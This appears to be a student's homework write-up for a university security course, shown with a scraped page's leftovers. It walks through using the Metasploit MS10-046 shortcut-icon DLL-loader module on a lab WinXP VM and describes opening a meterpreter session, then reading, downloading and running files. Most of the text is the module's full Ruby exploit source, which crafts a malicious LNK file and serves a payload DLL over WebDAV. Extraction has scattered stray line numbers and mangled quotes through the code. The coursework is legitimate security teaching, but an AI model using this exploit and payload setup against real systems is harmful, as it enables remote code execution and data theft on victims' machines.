solution
Homework #3
In this homework you will pick a metasploit module and demonstrate how to use it to gain
access to your WinXP VM instance. You should use the ONL topology for this homework.
In class, we used the ms_03_026_dcom module; you must choose a different one for this
homework. Similarly, the Metasploit Unleashed tutorial uses ms08_067_netapi; so that one
cannot be used either. Other than these constraints, you are free to choose any module so long
as you are able to demonstrate that it can be used to (at a minimum) open a meterpreter
session on your WinXP VM instance.
For your write-up and turn-in document, make a copy of this document, rename it to hw3-
notes, and move it into your CSE 523 Google Docs collection. Use this document to complete
the homework, using the space provided below.
You are to complete this homework on your own. Do not ask (or answer) questions of other
students; do not discuss any aspect of this homework with any other student. Direct all
questions to the TAs or me.
Your complete homework should include the following.
An annotated transcript illustrating how to use your module of choice; include at least one
screenshot at the end to demonstrate that it worked. Your transcript should be clear and
easy for someone to reproduce; you can assume that a reader has the same
Ubuntu/WinXP setup that you do. Your annotated transcript should be as easy to follow as
exploring-msploit-notes. (You do not need to include gates.)
Identify and briefly describe the vulnerability that is being exploited with this module. Add
links to the appropriate CVE and MS bulletins.
Find the ruby source code for the exploit module. Include both the URL to the source file
at github and a copy of the ruby source code in your write-up.
Your writeup should be organized and well-written, with proper grammar and spelling.
Do not change anything above this line. Add your homework write-up below it.
Exploit Steps
Open msfconsole
https://github.com/rapid7/metasploit-framework
Exploit settings
I set module ms10_046_shortcut_icon_dllloader as the exploit to be used. Then set
reverse_tcp as the payload.
This module will start a web server. We need to specify the server host ip address using
SRVHOST . Then I also set the metasploit execution host LHOST . And use show options to
check the settings.
Exploit
Use exploit command to conduct the exploit.
After executing exploit command, the server starts. When the client accesses the url, the
server will send the client malicious DLL.
Access URL in the winxp
In the winxp vm, open the IE, input the url and press Enter key.
Open Meterpreter Session
When the victim client accesses the url, the server sends the malicious DLL to the client that
creates the WebDAV service. The exploit is successful and it opens a meterpreter session.
Start Interaction with the meterpreter session
Now we can access the winxp system in my meterpreter session. The following shows that I cd
to ‘C:’ directory, list files in the directory and read the content in info.txt .
The following shows that I can download the file and start a program.
Vulnerability Discussion
This module exploits vulnerability described in this link
https://www.symantec.com/security_response/vulnerability.jsp?bid=41732. In summary, this
module creates a shortcut link that points to a malicious DLL. The winxp system has
vulnerability that allows the file to automatically run which let the module to run the payload.
Modulce Source Code
https://github.com/rapid7/metasploit-
framework/blob/master/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloade
r.rb
##
# This module requires Metasploit: https://metasploit.com/download
1
2
https://www.symantec.com/security_response/vulnerability.jsp?bid=41732.
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Microsoft Windows Shell LNK Code
Execution’,
‘Description’ => %q{
This module exploits a vulnerability in the handling of
Windows
Shortcut files (.LNK) that contain an icon resource pointing to
a
malicious DLL. This module creates a WebDAV service that can be
used
to run an arbitrary payload when accessed as a UNC path.
},
‘Author’ =>
[
‘hdm’, # Module itself
‘jduck’, # WebDAV implementation, UNCHOST var
‘B_H’ # Clean LNK template
],
‘License’ => MSF_LICENSE,
‘References’ =>
[
[‘CVE’, ‘2010-2568’],
[‘OSVDB’, ‘66387’],
[‘MSB’, ‘MS10-046’],
[‘URL’,
‘http://www.microsoft.com/technet/security/advisory/2286198.mspx’]
],
‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘process’,
},
‘Payload’ =>
{
‘Space’ => 2048,
},
‘Platform’ => ‘win’,
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
‘Targets’ =>
[
[ ‘Automatic’, { } ]
],
‘DisclosureDate’ => ‘Jul 16 2010’,
‘DefaultTarget’ => 0))
register_options(
[
OptPort.new( ‘SRVPORT’, [ true, “The daemon port to
listen on (do not change)”, 80 ]),
OptString.new( ‘URIPATH’, [ true, “The URI to use (do
not change).”, “/” ]),
OptString.new( ‘UNCHOST’, [ false, “The host portion of
the UNC path to provide to clients (ex: 1.2.3.4).” ])
])
deregister_options(‘SSL’, ‘SSLVersion’) # Just for now
end
def on_request_uri(cli, request)
case request.method
when ‘OPTIONS’
process_options(cli, request)
when ‘PROPFIND’
process_propfind(cli, request)
when ‘GET’
process_get(cli, request)
else
print_error(“Unexpected request method encountered: #
{request.method}”)
resp = create_response(404, “Not Found”)
resp.body = “”
resp[‘Content-Type’] = ‘text/html’
cli.send_response(resp)
end
end
def process_get(cli, request)
myhost = (datastore[‘SRVHOST’] == ‘0.0.0.0’) ?
Rex::Socket.source_address(cli.peerhost) : datastore[‘SRVHOST’]
webdav = “\\#{myhost}\”
if (request.uri =~ /.dll$/i)
print_status “Sending DLL payload”
return if ((p = regenerate_payload(cli)) == nil)
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
data = generate_payload_dll({ :code => p.encoded })
send_response(cli, data, { ‘Content-Type’ => ‘application/octet-
stream’ })
return
end
if (request.uri =~ /.lnk$/i)
print_status “Sending LNK file”
send_response(cli, data, { ‘Content-Type’ => ‘application/octet-
stream’ })
return
end
print_status “Sending UNC redirect”
resp = create_response(200, “OK”)
resp.body = %Q||
resp[‘Content-Type’] = ‘text/html’
cli.send_response(resp)
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request)
print_status(“Responding to WebDAV OPTIONS request”)
headers = {
‘MS-Author-Via’ => ‘DAV’,
# ‘DASL’ => ”,
# ‘DAV’ => ‘1, 2’,
‘Allow’ => ‘OPTIONS, GET, PROPFIND’,
‘Public’ => ‘OPTIONS, GET, PROPFIND’
}
resp = create_response(207, “Multi-Status”)
resp.body = “”
resp[‘Content-Type’] = ‘text/xml’
cli.send_response(resp)
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind(cli, request)
path = request.uri
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
print_status(“Received WebDAV PROPFIND request for #{path}”)
body = ”
my_host = (datastore[‘SRVHOST’] == ‘0.0.0.0’) ?
Rex::Socket.source_address(cli.peerhost) : datastore[‘SRVHOST’]
my_uri = “http://#{my_host}/”
if path =~ /.dll$/i
# Response for the DLL
print_status(“Sending DLL multistatus for #{path} …”)
body = %Q|
#{path}#{@exploit_dll}
2010-07-19T20:29:42Z
#{rand(0x100000)+128000}
Mon, 19 Jul 2010 20:29:42
GMT
“#{“%.16x” % rand(0x100000000)}”
T
application/octet-stream
HTTP/1.1 200 OK
|
resp = create_response(207, “Multi-Status”)
resp.body = body
resp[‘Content-Type’] = ‘text/xml’
cli.send_response(resp)
return
end
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
if path =~ /.lnk$/i
# Response for the DLL
print_status(“Sending DLL multistatus for #{path} …”)
body = %Q|
#{path}#{@exploit_lnk}
2010-07-19T20:29:42Z
#{rand(0x100)+128}
Mon, 19 Jul 2010 20:29:42
GMT
“#{“%.16x” % rand(0x100000000)}”
T
shortcut
HTTP/1.1 200 OK
|
resp = create_response(207, “Multi-Status”)
resp.body = body
resp[‘Content-Type’] = ‘text/xml’
cli.send_response(resp)
return
end
if path !~ //$/
if path.index(“.”)
print_status(“Sending 404 for #{path} …”)
resp = create_response(404, “Not Found”)
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
resp[‘Content-Type’] = ‘text/html’
cli.send_response(resp)
return
else
print_status(“Sending 301 for #{path} …”)
resp = create_response(301, “Moved”)
resp[“Location”] = path + “/”
resp[‘Content-Type’] = ‘text/html’
cli.send_response(resp)
return
end
end
print_status(“Sending directory multistatus for #{path} …”)
body = %Q|
#{path}
2010-07-19T20:29:42Z
Mon, 19 Jul 2010 20:29:42
GMT
“#{“%.16x” % rand(0x100000000)}”
httpd/unix-directory
HTTP/1.1 200 OK
|
subdirectory = %Q|
#{path}#{Rex::Text.rand_text_alpha(6)}/
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
2010-07-19T20:29:42Z
Mon, 19 Jul 2010 20:29:42
GMT
“#{“%.16x” % rand(0x100000000)}”
httpd/unix-directory
HTTP/1.1 200 OK
|
files = %Q|
#{path}#{@exploit_dll}
2010-07-19T20:29:42Z
#{rand(0x100000)+128000}
Mon, 19 Jul 2010 20:29:42
GMT
“#{“%.16x” % rand(0x100000000)}”
T
application/octet-stream
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
HTTP/1.1 200 OK
#{path}#{@exploit_lnk}
2010-07-19T20:29:42Z
#{rand(0x100)+128}
Mon, 19 Jul 2010 20:29:42
GMT
“#{“%.16x” % rand(0x100000000)}”
T
shortcut
HTTP/1.1 200 OK
|
if request[“Depth”].to_i > 0
if path.scan(“/”).length < 2 body << subdirectory else body << files end end body << “”
body.gsub!(/t/, ”)
# send the response
resp = create_response(207, “Multi-Status”)
resp.body = body
resp[‘Content-Type’] = ‘text/xml; charset=”utf8″‘
cli.send_response(resp)
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
end
def generate_link(unc)
uni_unc = unc.unpack(“C*”).pack(“v*”)
path = ”
path << [ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack(“C*”) path << uni_unc # LinkHeader ret = [ 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ].pack(‘C*’) idlist_data = ” idlist_data << [0x12 + 2].pack(‘v’) idlist_data << [ 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack(‘C*’) idlist_data << [0x12 + 2].pack(‘v’) idlist_data << [ 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, 0x30, 0x9d ].pack(‘C*’) idlist_data << [path.length + 2].pack(‘v’) idlist_data << path idlist_data << [0x00].pack(‘v’) # TERMINAL WOO # LinkTargetIDList ret << [idlist_data.length].pack(‘v’) # IDListSize ret << idlist_data # ExtraData blocks (none) ret << [rand(4)].pack(‘V’) 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 # Patch in the LinkFlags ret[0x14, 4] = [“10000001000000000000000000000000”.to_i(2)].pack(‘N’) ret end def exploit unc = “\\” if (datastore[‘UNCHOST’]) unc << datastore[‘UNCHOST’].dup else unc << ((datastore[‘SRVHOST’] == ‘0.0.0.0’) ? Rex::Socket.source_address(‘50.50.50.50’) : datastore[‘SRVHOST’]) end unc << “\” unc << rand_text_alpha(rand(8)+4) unc << “\” @exploit_unc = unc @exploit_lnk = rand_text_alpha(rand(8)+4) + “.lnk” @exploit_dll = rand_text_alpha(rand(8)+4) + “.dll” if datastore[‘SRVPORT’].to_i != 80 || datastore[‘URIPATH’] != ‘/’ fail_with(Failure::Unknown, ‘Using WebDAV requires SRVPORT=80 and URIPATH=/’) end print_status(“Send vulnerable clients to #{@exploit_unc}.”) print_status(“Or, get clients to save and render the icon of http:///.lnk”)
super
end
end
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
Homework #3
Exploit Steps
Open msfconsole
Exploit settings
Exploit
Access URL in the winxp
Open Meterpreter Session
Start Interaction with the meterpreter session
Vulnerability Discussion
Modulce Source Code
Reviews
There are no reviews yet.